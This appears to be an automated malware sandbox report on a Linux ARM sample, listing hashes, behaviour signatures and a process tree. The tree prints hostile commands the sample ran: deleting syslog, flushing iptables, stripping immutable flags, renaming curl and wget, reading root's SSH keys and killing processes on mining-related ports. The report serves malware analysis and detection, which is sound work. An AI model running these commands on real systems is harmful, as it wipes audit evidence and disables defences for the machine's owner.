1b0be209ed0d4918c70b84427667f164f40d90efc2998553cd08f2219d2e6f04

Analysis

max time kernel
4s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
10-08-2024 05:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

84e5ee91b2eecfb946ff935cd8ff5e80_JaffaCakes118
Size

35KB
MD5

84e5ee91b2eecfb946ff935cd8ff5e80
SHA1

f7cb4120aacc2fc85e7eb655cc2d8fc4d40e59e6
SHA256

1b0be209ed0d4918c70b84427667f164f40d90efc2998553cd08f2219d2e6f04
SHA512

8b918c0e9c8c42018df31da1eef062215ef6ff4f12046e5ca987aa1e0df7a8a85bad8e5db8cfef4b6fdbfab7be470e250e4bc5845e77b9f0422b6aef966f9485
SSDEEP

384:zQQwQHDf6lpTWg3vM4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdUeUoJpJydIDbv:TFNB48Fkc2zq0xvcGGIr9L8eT

Score

7^/10

evasion

Malware Config

Signatures

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal

T1070

Processes:

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

Processes:

iptables

pid	Process
673	iptables

Attempts to change immutable files 14 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargschattrchattrxargsxargsxargsxargsxargsxargsxargsxargsxargs

pid	Process
744	xargs
750	xargs
738	xargs
668	chattr
671	chattr
694	xargs
701	xargs
720	xargs
707	xargs
713	xargs
726	xargs
756	xargs
762	xargs
732	xargs

Reads CPU attributes 1 TTPs 1 IoCs

System Information Discovery

T1082

Processes:

sysctl

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	sysctl

Reads runtime system information 41 IoCs

Reads data from /proc virtual filesystem.

Processes:

awkmvxargsxargsxargsawkawkxargsawkmvmvuserdelawkxargsawkawkuserdelsysctlxargsawkawkmvawkxargsawkxargsxargsawkawkxargsawkawkawkawkawkawkawkawkawkxargs

description	ioc	Process
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	userdel
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/filesystems	userdel
File opened for reading	/proc/sys/kernel/osrelease	sysctl
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/filesystems	sysctl
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/fd	xargs

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

84e5ee91b2eecfb946ff935cd8ff5e80_JaffaCakes118

description	ioc	Process
File opened for modification	/tmp/dev/null	84e5ee91b2eecfb946ff935cd8ff5e80_JaffaCakes118

/tmp/84e5ee91b2eecfb946ff935cd8ff5e80_JaffaCakes118
/tmp/84e5ee91b2eecfb946ff935cd8ff5e80_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:643
- /bin/sync
  sync
  2⤵
  PID:644
- /bin/cat
  cat /var/spool/cron/
  2⤵
  PID:651
- /bin/cat
  cat /root/.ssh/authorized_keys
  2⤵
  PID:653
- /bin/mv
  mv /usr/bin/curl /usr/bin/url
  2⤵
  - Reads runtime system information
  PID:656
- /bin/mv
  mv /usr/bin/url /usr/bin/cd1
  2⤵
  - Reads runtime system information
  PID:658
- /bin/mv
  mv /usr/bin/wget /usr/bin/get
  2⤵
  - Reads runtime system information
  PID:661
- /bin/mv
  mv /usr/bin/get /usr/bin/wd1
  2⤵
  - Reads runtime system information
  PID:663
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:666
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:668
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:671
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:673
- /usr/sbin/userdel
  userdel akay
  2⤵
  - Reads runtime system information
  PID:677
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  - Reads runtime system information
  PID:679
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:681
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:682
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:683
- /bin/rm
  rm -f /tmp/.null
  2⤵
  PID:685
- /sbin/sysctl
  sysctl -w "vm.nr_hugepages=128"
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:687
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:691
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:692
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:693
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:694
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:701
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:700
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:699
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:698
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:707
- /bin/grep
  grep -v -
  2⤵
  PID:706
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:705
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:704
- /bin/grep
  grep :443
  2⤵
  PID:703
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:713
- /bin/grep
  grep -v -
  2⤵
  PID:712
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:711
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:710
- /bin/grep
  grep :23
  2⤵
  PID:709
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:718
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:717
- /bin/grep
  grep :443
  2⤵
  PID:716
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:720
- /bin/grep
  grep -v -
  2⤵
  PID:719
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:726
- /bin/grep
  grep -v -
  2⤵
  PID:725
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:724
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:723
- /bin/grep
  grep :143
  2⤵
  PID:722
- /bin/grep
  grep -v -
  2⤵
  PID:731
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:730
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:732
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:729
- /bin/grep
  grep :2222
  2⤵
  PID:728
- /bin/grep
  grep -v -
  2⤵
  PID:737
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:736
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:738
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:735
- /bin/grep
  grep :3333
  2⤵
  PID:734
- /bin/grep
  grep -v -
  2⤵
  PID:743
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:742
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:744
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:741
- /bin/grep
  grep :3389
  2⤵
  PID:740
- /bin/grep
  grep -v -
  2⤵
  PID:749
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:748
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:750
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:747
- /bin/grep
  grep :5555
  2⤵
  PID:746
- /bin/grep
  grep -v -
  2⤵
  PID:755
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:754
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:756
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:753
- /bin/grep
  grep :6666
  2⤵
  PID:752
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:762
- /bin/grep
  grep -v -
  2⤵
  PID:761
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:760
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:759
- /bin/grep
  grep :6665
  2⤵
  PID:758

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/zzhs

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
memory/742-1-0xb6b03000-0xb6b14044-memory.dmp

Download